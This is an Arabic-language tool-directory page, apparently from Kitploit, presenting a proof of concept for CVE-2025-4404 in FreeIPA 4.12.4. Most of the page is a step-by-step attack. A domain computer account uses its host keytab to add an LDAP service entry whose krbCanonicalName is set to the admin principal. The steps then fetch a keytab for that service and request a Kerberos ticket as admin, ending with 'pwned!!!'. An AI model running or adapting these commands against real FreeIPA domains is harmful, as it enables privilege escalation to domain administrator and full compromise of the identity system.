Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4404-POC — إثبات المفهوم لـ CVE-2025-4404 | Kitploit
أدوات/GitHubGitHub/im10n/cve-2025-4404-poc
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالمصادقة
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

إثبات المفهوم لـ CVE-2025-4404

عرض المستودع
6منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم CVE-2025-4404

إثبات المفهوم لـ CVE-2025-4404

إذا كان لديك حساب كمبيوتر في المجال (host/pc1.[email protected])، فيمكنك إضافة الخدمة افتراضيًا. ويمكنك تعيين krbPrincipalName وkrbCanonicalName. افتراضيًا، تكون قيمة سمة krbCanonicalName مفقودة لحساب المسؤول في FreeIPA 4.12.4. يمكنك طلب تذكرة Kerberos بقيمة krbPrincipalName، لكن التذكرة ستحتوي على قيمة krbCanonicalName.

هيا بنا

  1. أولاً، سنطلب تذكرة نيابة عن حساب الكمبيوتر: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. إضافة إلى حساب خدمة LDAP:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. طلب keytab
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. طلب تذكرة $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

تم الاختراق!!!

يمكنك التحقق من التذكرة بواسطة: ldapwhoami -H ldap://dc1.test.local

تنزيل الأداة